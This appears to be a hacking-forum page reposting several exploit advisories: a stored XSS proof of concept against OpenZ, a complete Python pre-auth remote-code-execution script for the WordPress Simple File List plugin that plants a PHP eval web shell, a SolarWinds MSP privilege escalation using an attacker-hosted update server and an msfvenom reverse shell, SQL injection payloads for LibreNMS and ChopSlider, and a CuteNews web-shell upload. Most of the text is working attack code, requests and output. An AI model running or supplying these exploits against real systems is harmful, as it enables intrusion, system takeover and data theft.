/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html 4. Successful reproduce of the persistent web vulnerability! --- POC Session Logs [POST] --- (Inject via Add / Edit) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 1464 Origin: https://localhost:8080 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=& inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=& inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=& inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F& inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/ EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B& inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=& inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=& inpvalue=325235&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>& inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>&inpimageurl=31337& inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=& inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=& inpcity=&inpcreated=26-04-2020 17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 17:03:35&inpupdatedby=Service - POST: HTTP/1.1 302 Found Server: Apache/2.4.38 (Debian) Location: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - (Execution in Listing) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source Host: myerponline.de Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 - GET: HTTP/1.1 200 OK Server: Apache/2.4.38 (Debian) Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1110 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive PoC: Vulnerable Source (/security/Menu.html) <table width="0px" height="0px" cellspacing="0" cellpadding="0"> <tbody><tr> <td><input type="text" class="DataGrid_Table_Dummy_Input" id="grid_table_dummy_input"></td> </tr> </tbody></table> <input type="hidden" name="inpcBpartnerId" value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent"> <div class="RelationInfoContainer"> <table class="RelationInfo"> <tbody><tr> <td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td> <td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 - >"><iframe src="a"></TD> </TR> Reference(s): https://localhost:8080/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
  21. HireHackking

    WordPress Plugin Simple File List 4.2.2 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Remote Code Execution # Date: 2020-04-19 # Exploit Author: coiffeur # Vendor Homepage: https://simplefilelist.com/ # Software Link: https://wordpress.org/plugins/simple-file-list/ # Version: Wordpress Simple File List <= v4.2.2 import requests import random import hashlib import sys import os import urllib3 urllib3.disable_warnings() dir_path = '/wp-content/uploads/simple-file-list/' upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' def usage(): banner = """ NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL> AUTHOR: coiffeur """ print(banner) def generate(): filename = f'{random.randint(0, 10000)}.png' password = hashlib.md5(bytearray(random.getrandbits(8) for _ in range(20))).hexdigest() with open(f'{filename}', 'wb') as f: payload = '<?php if($_POST["password"]=="' + password + \ '"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>' f.write(payload.encode()) print(f'[ ] File {filename} generated with password: {password}') return filename, password def upload(url, filename): files = {'file': (filename, open(filename, 'rb'), 'image/png')} datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'} r = requests.post(url=f'{url}{upload_path}', data=datas, files=files, verify=False) r = requests.get(url=f'{url}{dir_path}{filename}', verify=False) if r.status_code == 200: print(f'[ ] File uploaded at {url}{dir_path}{filename}') os.remove(filename) else: print(f'[*] Failed to upload {filename}') exit(-1) return filename def move(url, filename): new_filename = f'{filename.split(".")[0]}.php' headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', 'X-Requested-With': 'XMLHttpRequest'} datas = {'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'} r = requests.post(url=f'{url}{move_path}', data=datas, headers=headers, verify=False) if r.status_code == 200: print(f'[ ] File moved to {url}{dir_path}{new_filename}') else: print(f'[*] Failed to move {filename}') exit(-1) return new_filename def main(url): file_to_upload, password = generate() uploaded_file = upload(url, file_to_upload) moved_file = move(url, uploaded_file) if moved_file: print(f'[+] Exploit seem to work.\n[*] Confirmning ...') datas = {'password': password, 'cmd': 'phpinfo();'} r = requests.post(url=f'{url}{dir_path}{moved_file}', data=datas, verify=False) if r.status_code == 200 and r.text.find('php') != -1: print('[+] Exploit work !') print(f'\tURL: {url}{dir_path}{moved_file}') print(f'\tPassword: {password}') if __name__ == "__main__": if (len(sys.argv) < 2): usage() exit(-1) main(sys.argv[1])
  22. HireHackking

    SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG # Date: 2020-05-06 # Vendor: https://www.solarwindsmsp.com/ # CVE: CVE-2020-12608 # GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608 # CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H] # CWE: 276 Vulnerable version ================== SolarWinds MSP PME (Patch Management Engine) before 1.1.15 Timeline ======== 2020-04-24 Vulnerability discovered 2020-04-27 Send details to SolarWinds PSIRT 2020-04-27 SolarWinds confirmed the vulnerability 2020-05-05 SolarWinds released PME version 1.1.15 2020-05-06 Public disclosure Description =========== An error with insecure file permissions has occurred in the SolarWinds MSP Cache Service, which is part of the Advanced Monitoring Agent and can lead to code execution. The SolarWinds MSP Cache Service is typically used to get new update definition files and versions for ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The XML file CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so that the parameter SISServerURL can be changed, which controls the location of the updates. After some analysis, we were able to provide modified XML files (PMESetup_details.xml and ThirdPartyPatch_details.xml) that point to an executable file with a reverse TCP payload using our controlled SISServerURL web server for SolarWinds MSP Cache Service. Proof of Concept (PoC) ====================== As we can see, NTFS change permissions are set to CacheService.xml by default. Any user on the system who is in group users can change the file content. This is especially a big problem on terminal servers or multi-user systems. PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml .\CacheService.xml VORDEFINIERT\Benutzer:(I)(M) NT-AUTORITÄT\SYSTEM:(I)(F) VORDEFINIERT\Administratoren:(I)(F) 1. Modify CacheService.xml In the xml file, the parameter SISServerURL was adjusted, which now points to a web server controlled by the attacker. <?xml version="1.0" encoding="utf-8"?> <Configuration> <CachingEnabled>True</CachingEnabled> <ApplianceVersion>1.1.14.2223</ApplianceVersion> <CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation> <CacheSizeInMB>10240</CacheSizeInMB> <SISServerURL>https://evil-attacker.example.org</SISServerURL> <LogLevel>5</LogLevel> <Proxy></Proxy> <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt> <ProxyCacheService /> <CacheFilesDeleted></CacheFilesDeleted> <CacheDeletedInBytes></CacheDeletedInBytes> <HostApplication>RMM</HostApplication> <CanBypassProxyCacheService>True</CanBypassProxyCacheService> <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds> <ComponentUpdateMinutes>300</ComponentUpdateMinutes> <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds> </Configuration> 2. Payload creation Generate an executable file, for example using msfvenom, that establishes a reverse tcp connection to the attacker and store it on the web server. msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe 3. Prepare web server Place the modified xml files (PMESetup_details.xml or ThirdPartyPatch_details.xml) on the web server in the path /ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the executable, set correct values for SizeInBytes and increase the version. Example of PMESetup_details.xml <ComponentDetails> <Name>Patch Management Engine</Name> <Description>Patch Management Engine</Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.1.14.2224</Version> </ComponentDetails> Example of ThirdPartyPatch_details.xml <ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Name>Third Party Patch</Name> <Description> Third Party Patch application for Patch Management Engine RMM v 1 and later </Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.2.1.95</Version> </ComponentDetails> 4. Malicious executable download After restarting the system or reloading the CacheService.xml, the service connects to the web server controlled by the attacker and downloads the executable file. This is then stored in the path %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and %PROGRAMDATA%\SolarWinds MSP\PME\archives\. [24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-" [24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-" 5. Getting shell After a certain time the executable file is executed by SolarWinds MSP RPC Server service and establishes a connection with the rights of the system user to the attacker. [~]: nc -nlvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980) Microsoft Windows [Version 10.0.18363.778] (c) 2019 Microsoft Corporation. Alle Rechte vorbehalten. C:\WINDOWS\system32>whoami whoami nt-authority\system C:\WINDOWS\system32> Fix === There is a new PME version 1.1.15 which comes with auto-update https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/
  23. HireHackking

    LibreNMS 1.46 - 'search' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LibreNMS 1.46 - 'search' SQL Injection # Google Dork:unknown # Date: 2019-09-01 # Exploit Author: Punt # Vendor Homepage: https://www.librenms.org # Software Link: https://www.librenms.org # Version:1.46 and less # Tested on:Linux and Windows # CVE: N/A #Affected Device: more than 4k found on Shodan and Censys. #Description about the bug Vunlerable script /html/ajax_serarch.php if (isset($_REQUEST['search'])) { $search = mres($_REQUEST['search']); header('Content-type: application/json'); if (strlen($search) > 0) { $found = 0; if ($_REQUEST['type'] == 'group') { include_once '../includes/device-groups.inc.php'; foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) { if ($_REQUEST['map']) { $results[] = array( 'name' => 'g:'.$group['name'], 'group_id' => $group['id'], as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST[''] dbFetchRows() used to exectute sql query now lets check the mres() function the mres() fuction is located under /includes/common.php function mres($string) { return $string; // global $database_link; return mysqli_real_escape_string($database_link, $string); as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%' #POC: 1st lgoin to your LibreNMS 2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules 3rd you will see an sql syntax error The Librenms team have applyed a patch . Thanks Punt (From Ethiopia)
  24. HireHackking

    CuteNews 2.1.2 - Authenticated Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CuteNews 2.1.2 - Authenticated Arbitrary File Upload # Date: 2020-05-12 # Author: Vigov5 - SunCSR Team # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 # Tested on: Ubuntu 18.04 / Kali Linux Description: ------------------------------------------------------------------------ In the "Media Manager" area, Users with low privileges (Editor) can bypass file upload restrictions, resulting in arbitrary command execution. [PoC] -------------------------------------------------------------------------------- # Step 1. Create shell $ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.png; # Step 2. Upload Shell (# Minimum editor privileges) POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------15868731501112834542363527723 Content-Length: 3775 Origin: [target] DNT: 1 Connection: close Referer: [target]/CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="mod" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="opt" media -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="folder" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="CKEditorFuncNum" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="callback" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="style" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="faddm" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="imgopts" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_key" 7ffa4c94a150c20f0c1b51036f6e4597-editor -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="__signature_dsi" 48d87ded04d15407f258c57efa3216e8 -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_from_inet" -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload_file[]"; filename="shell.png" Content-Type: image/png [Content Image Here ! ] -----------------------------15868731501112834542363527723 Content-Disposition: form-data; name="upload" Upload file(s) -----------------------------15868731501112834542363527723-- # Step 3. Change filename shell.jpg to shell.php POST /CuteNews/index.php HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: [target] DNT: 1 Connection: close Referer: http://[target]CuteNews/index.php Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=ebdaf403dcda492fabe8f1d96399b16b-editor&__signature_dsi=27a9035f2b130dd1477ad2a37a5721da&pending=rename&ids%5B0%5D=shell.png&place%5B0%5D=shell.php # Step 4. Execute the command with the path : http:// [target]/CuteNews/uploads/shell.php?cmd=id
  25. HireHackking

    WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection # Exploit Author: SunCSR (Sun* Cyber Security Research) # Google Dork: N/A # Date: 2020-05 -12 # Vendor Homepage: https://idangero.us/ # Software Link: https://github.com/idangerous/Plugins # Version: <= 3.4 # Tested on: Ubuntu 18.04 # CVE: 2020-11530 Description: A blind SQL injection vulnerability is present in Chop Slider 3 '/wp-content/plugins/chopslider/get_script/index.php': $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id); PoC: Blind SQL injection: GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868 SQLMap using: sqlmap -u ' http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3 sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-3097 OR 2236=2236 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1111111111 OR SLEEP(5) --- [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0.12